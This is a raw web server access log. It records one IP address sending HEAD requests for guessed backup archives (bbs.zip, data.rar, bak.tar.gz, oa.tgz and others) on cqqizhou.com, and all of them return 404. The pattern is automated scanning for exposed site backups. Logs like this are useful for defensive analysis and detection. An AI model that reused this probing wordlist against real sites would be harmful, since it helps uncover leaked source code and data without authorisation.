103.100.159.2 - - [21/Oct/2025:15:09:22 +0800] "HEAD /1.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/1.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [21/Oct/2025:15:09:23 +0800] "HEAD /bbs.zip HTTP/1.1" 404 0 "http://cqqizhou.com/bbs.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [21/Oct/2025:15:09:24 +0800] "HEAD /bbs.rar HTTP/1.1" 404 0 "http://cqqizhou.com/bbs.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [21/Oct/2025:15:09:24 +0800] "HEAD /bbs.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/bbs.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [21/Oct/2025:15:09:25 +0800] "HEAD /bbs.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/bbs.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [21/Oct/2025:15:09:26 +0800] "HEAD /123.zip HTTP/1.1" 404 0 "http://cqqizhou.com/123.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [21/Oct/2025:15:09:26 +0800] "HEAD /123.rar HTTP/1.1" 404 0 "http://cqqizhou.com/123.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [21/Oct/2025:15:09:27 +0800] "HEAD /123.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/123.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [21/Oct/2025:15:09:27 +0800] "HEAD /123.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/123.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [21/Oct/2025:15:09:28 +0800] "HEAD /data.zip HTTP/1.1" 404 0 "http://cqqizhou.com/data.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [21/Oct/2025:15:09:29 +0800] "HEAD /data.rar HTTP/1.1" 404 0 "http://cqqizhou.com/data.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [21/Oct/2025:15:09:29 +0800] "HEAD /data.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/data.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [21/Oct/2025:15:09:30 +0800] "HEAD /data.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/data.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [21/Oct/2025:15:09:30 +0800] "HEAD /bak.zip HTTP/1.1" 404 0 "http://cqqizhou.com/bak.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [21/Oct/2025:15:09:31 +0800] "HEAD /bak.rar HTTP/1.1" 404 0 "http://cqqizhou.com/bak.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [21/Oct/2025:15:09:32 +0800] "HEAD /bak.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/bak.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [21/Oct/2025:15:09:32 +0800] "HEAD /bak.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/bak.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [21/Oct/2025:15:09:33 +0800] "HEAD /oa.zip HTTP/1.1" 404 0 "http://cqqizhou.com/oa.zip" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [21/Oct/2025:15:09:34 +0800] "HEAD /oa.rar HTTP/1.1" 404 0 "http://cqqizhou.com/oa.rar" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [21/Oct/2025:15:09:34 +0800] "HEAD /oa.tar.gz HTTP/1.1" 404 0 "http://cqqizhou.com/oa.tar.gz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
103.100.159.2 - - [21/Oct/2025:15:09:35 +0800] "HEAD /oa.tgz HTTP/1.1" 404 0 "http://cqqizhou.com/oa.tgz" "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)"
